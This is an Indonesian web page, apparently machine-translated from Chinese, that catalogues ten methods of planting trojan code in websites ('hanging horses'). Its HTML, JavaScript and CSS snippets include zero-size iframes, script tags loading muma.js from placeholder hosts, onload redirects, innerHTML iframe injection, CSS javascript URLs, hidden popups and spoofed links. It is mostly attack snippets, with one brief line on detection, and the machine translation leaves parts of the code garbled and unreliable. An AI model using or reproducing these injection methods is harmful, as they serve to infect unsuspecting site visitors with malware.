1: Bingkai Hang Horse
<iframe src = addressWidth = 0 tinggi = 0> </iframe>
Di antara mereka, tautan situs web berbahaya dapat dimasukkan di "alamat"
Dua: file js hang
Selama itu adalah file JS, itu dapat dimodifikasi secara jahat dan kode jahat dapat digantung. Secara umum, kode JS yang dirujuk oleh seluruh situs kemungkinan besar akan digantung dengan Trojan. Kita dapat memeriksa kode kiri atau bawah JS. Orang jahat suka menyembunyikan kode jahat dan kode normal dengan banyak spasi atau pengembalian kereta, jadi kita harus memeriksa apakah halaman kode JS sengaja diperpanjang, dll.
Tiga: Enkripsi Deformasi JS
<Script language = "jscript.encode" src = http: //www.xxx.com/muma.txt> </ptript>
muma.txt dapat diubah ke akhiran apa pun
Empat: Tubuh Menggantung Kuda
<body onload = "window.location = 'address';"> </body>
Lima: Menyembunyikan kuda yang tidak terlihat
top.document.body.innerHtml = top.document.body.innerhtml + '/r/n <iframe src = "http://www.xxx.com/muma.htm/"> </iframe>';
Enam: CSS Hang Horse
tubuh {
latar belakang-gambar: url ('javascript: document.write ("<skrip src = http: //www.xxx.net/muma.js> </ptript>")')}
Metode ini lebih kejam dan sulit ditemukan.
Tujuh: Jaja Hang Horse
<Bahasa skrip = javascript>
window.open ("alamat", "", "toolbar = tidak, lokasi = tidak, direktori = tidak, status = tidak, menubar = tidak, scro llbars = tidak, lebar = 1, tinggi = 1");
</script>
Delapan: Picture Disguise
<Html>
<iframe src = "博题题题题" tinggi = 0 lebar = 0> </iframe>
<img src = "alamat gambar"> </center>
</html>
Sembilan: Panggilan yang disamarkan
<frameset rows = "444,0" cols = "*">
<frame src = "buka webpage" frameborder = "no" scrolling = "auto" noresize marginwidth = "0" margingheight = "0">
<frame src = "net horse address" frameborder = "no" scrolling = "no" noresize marginwidth = "0" margingheight = "0">
</fameset>
Sepuluh: Penipuan Lanjutan
<a href = "http://www.163.com (membingungkan alamat koneksi, tampilkan alamat ini poin ke alamat trojan)" onmouseover = "www_163_com (); kembalikan true;"> Apa yang harus ditampilkan pada halaman </a>
<Bahasa skrip = "javascript">
Fungsi www_163_com ()
{
var url = "博题题题题题题";
Buka (url, "newwindow", "toolbar = tidak, lokasi = tidak, direktori = tidak, status = tidak, menubar = tidak, scrollbars = tidak, dapat diputar ulang = tidak, copyhistory = ya, lebar = 800, tinggi = 600, kiri = 10, atas = 10");
}
</script>
Bagaimana cara menemukan perilaku di atas? Jika beberapa halaman memiliki kode kuda, maka diperlukan alat pengganti batch. Disarankan agar Anda menggunakannya.
Beberapa unduhan saluran server dari situs webmaster baru (lebih banyak perangkat lunak dapat diunduh di s.vevb.com)